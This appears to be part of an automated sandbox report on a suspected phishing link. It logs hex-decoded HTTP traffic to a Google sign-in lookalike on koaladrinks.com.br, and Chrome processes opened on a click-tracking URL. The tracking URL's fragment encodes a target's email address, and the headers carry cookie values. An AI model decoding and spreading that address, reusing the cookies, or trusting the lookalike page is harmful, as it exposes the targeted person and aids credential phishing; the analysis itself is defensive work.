                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; __Host-GAPS=1:3-UTC4SFRFjKOB1Be52QGuvKCrHSyw:Y_T9kLgzI5emAt_J; OTZ=7903228_76_76_104100_72_446760; NID=520=cyJ_sMpBkONW3ni1Q0FYfGRliLqtCJwmS0LiNbbh_1WIfY8dYaHqKXeCbJazrbUkofnU-WjvPG3LQQnBu1rIENmajUB5whDCPc5KWwSk6dJkbn8W0pIa_EobNSW4rrZovmDTiPLGQQZ3G38UVESzjDntnuCnoB89Ola69XbU3Yd59C2vK4TNNfqZVQ
                                                      2025-01-10 08:28:28 UTC4165OUTData Raw: 66 2e 72 65 71 3d 25 35 42 25 35 42 25 35 42 25 32 32 42 34 68 61 6a 62 25 32 32 25 32 43 25 32 32 25 35 42 31 25 32 43 31 25 32 43 6e 75 6c 6c 25 32 43 25 35 42 31 25 32 43 6e 75 6c 6c 25 32 43 6e 75 6c 6c 25 32 43 6e 75 6c 6c 25 32 43 25 35 42 25 35 43 25 32 32 6e 5a 25 35 42 38 67 32 28 67 31 78 25 33 43 4c 66 25 32 36 76 2e 25 35 43 25 32 32 25 32 43 6e 75 6c 6c 25 32 43 31 25 35 44 25 35 44 25 32 43 25 35 42 25 35 44 25 32 43 6e 75 6c 6c 25 32 43 25 35 42 25 35 42 25 35 42 25 35 43 25 32 32 54 4c 25 35 43 25 32 32 25 32 43 25 35 43 25 32 32 41 4f 2d 47 42 54 65 4f 50 53 42 4b 57 78 36 4b 4f 57 77 71 4b 74 34 66 59 4e 6d 36 56 61 65 47 70 4e 37 6c 64 44 7a 66 47 32 45 31 36 44 52 31 6a 4f 75 36 4c 68 39 43 45 64 6f 6d 6a 48 35 42 25 35 43 25 32 32 25
                                                      Data Ascii: f.req=%5B%5B%5B%22B4hajb%22%2C%22%5B1%2C1%2Cnull%2C%5B1%2Cnull%2Cnull%2Cnull%2C%5B%5C%22nZ%5B8g2(g1x%3CLf%26v.%5C%22%2Cnull%2C1%5D%5D%2C%5B%5D%2Cnull%2C%5B%5B%5B%5C%22TL%5C%22%2C%5C%22AO-GBTeOPSBKWx6KOWwqKt4fYNm6VaeGpN7ldDzfG2E16DR1jOu6Lh9CEdomjH5B%5C%22%
                                                      2025-01-10 08:28:29 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:29 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      2025-01-10 08:28:29 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:29 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:29 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:29 UTC89INData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 61 74 74 61 63 68 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 73 70 6f 6e 73 65 2e 62 69 6e 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 55 54 46 2d 38 27 27 72 65 73 70 6f 6e 73 65 2e 62 69 6e 0d 0a
                                                      Data Ascii: Content-Disposition: attachment; filename="response.bin"; filename*=UTF-8''response.bin
                                                      2025-01-10 08:28:29 UTC47INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                      Data Ascii: Content-Type: application/json; charset=utf-8
                                                      2025-01-10 08:28:29 UTC83INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                      2025-01-10 08:28:29 UTC41INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 73 69 74 65 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: same-site
                                                      2025-01-10 08:28:30 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 32 39 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:29 GMT


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to jump to process

                                                      Target ID:1
                                                      Start time:03:26:56
                                                      Start date:10/01/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                      Imagebase:0x7ff6b2cb0000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:03:27:01
                                                      Start date:10/01/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1904,i,2393401072678527284,7300859850790636309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                      Imagebase:0x7ff6b2cb0000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:4
                                                      Start time:03:27:08
                                                      Start date:10/01/2025
                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ctrk.klclick3.com/l/01JGXREPA9AKCFABSME4GFWDDZ_0#YWxhaW5femllZ2xlckB6aWVnbGVyZ3JvdXAuY29t"
                                                      Imagebase:0x7ff6b2cb0000
                                                      File size:3'242'272 bytes
                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      No disassembly